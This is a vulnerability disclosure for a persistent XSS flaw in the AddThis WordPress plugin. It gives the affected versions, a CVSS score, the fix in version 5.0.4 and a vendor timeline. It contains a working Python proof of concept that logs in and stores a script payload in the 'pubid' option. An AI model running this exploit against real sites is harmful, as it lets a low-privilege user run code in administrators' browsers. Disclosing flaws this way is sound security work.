Smart Website Tools by AddThis 4.0.6 - 4.0.7, Persistent XSS

The Smart Website Tools by AddThis plugin exposes an AJAX function called ‘at_async_loading’ in ‘addthis/addthis-for-wordpress.php’. Access to this function is restricted to Registered users, however is not restricted to Administrative users, meaning that anyone with an account on the target site can access this function. Neither is the input into the ‘pubid’ parameter sanitized, meaning that arbitrary HTML or JavaScript code can be inserted. This code is then executed when a user visits the Settings page for this plugin (wp-admin/options-general.php?page=addthis_social_widget).

Homepage

https://wordpress.org/plugins/addthis/

CVSS Score

4

CSSS Vector

(AV:N/AC:L/Au:S/C:N/I:P/A:N)

Attack Scope

remote

Authorization Required

Registered

Mitigation

Update to version 5.0.4.

Proof of Concept

When executed, the following PoC will override the ‘pubid’ option with a malicious payload, which will allow execution of arbitrary JavaScript if a user visits the options page for the plugin (wp-admin/options-general.php?page=addthis_social_widget).

import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"at_async_loading",
        "async_loading":1,
        "pubid":"'><script>alert(1)</script '"
}
r = s.post(url, data=payload)

Timeline

  • 2015-03-19: Discovered
  • 2015-03-19: Vendor notified
  • 2015-03-19: Vendor responded – link to report provided
  • 2015-03-20: Version 4.0.7 released – issue still present
  • 2015-03-26: Vendor responded with intent to fix
  • 2015-03-31: Update requested from Vendor
  • 2015-04-07: Vendor responded stating that a fix is in progress
  • 2015-04-13: Update requested from Vendor
  • 2015-04-16: Vendor states that fix is undergoing QA
  • 2015-05-04: Update requested from  Vendor
  • 2015-05-11: Update requested from Vendor
  • 2015-05-12: Vendor states that fix was rejected by QA, has been redeveloped and has been passed back to QA for re testing.
  • 2015-06-01: Notified vendor of intention to contact WordPress Plugins team
  • 2015-06-03: Version 5.0.4 released – issue resolved
  • 2015-06-10: Advisory released